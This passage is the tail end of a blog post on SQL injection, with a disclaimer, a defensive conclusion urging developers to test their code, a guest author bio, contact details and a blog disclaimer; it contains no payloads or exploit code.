0x2b => +

Readers, this article is for educational purposes only, could continue explaining how to exploit web sites, but that is not my intention.
It is known that the impact of the change may provide unauthorized access to a restricted area, being imperceptible to the eye of an inexperienced developer, it may also allow the deletion of a table, compromising the entire application, among other features. So I want to emphasize that this paper is for security researchs and developers to beware and test your code.

CONCLUSION

Many companies are providing important information on its website and database, information is the most valuable asset is intangible, the question is how developers are dealing with this huge responsibility?
The challenge is to develop increasingly innovative sites, coupled with mechanisms that will provide security to users.
The purpose of this paper is to present what is SQL Injection, how applications are explored and techniques for testing by allowing the developer to customize a system more robust and understand the vulnerability.

ABOUT THE AUTHOR:

This is a guest post written by , RAFAEL FONTES SOUZA. He is the maintainer of the “Project Backtrack Team Brazilian”, He works at RHAinfosec as a senior penetration tester. He is also the Founder of the "Wikileaks and Intelligence, Cypherpunks". Good communication in groups and the general public, attended college projects with a focus on business organization, he currently seeks work experience outside of brazil”. He frequently contributes at RHA and talks about various topics related to internet security. 

Contact Us

24x7 online , we happy to answer you
tamilcypc@gmail.com

Disclaimer

This Blog and its TUT's are intended for educational purposes only, no-one involved in the creation of this TuT may be held responsible for any illegal acts brought about by this Blog or TuT.



Featured Post

Custom Domains And HTTPS Redirection Code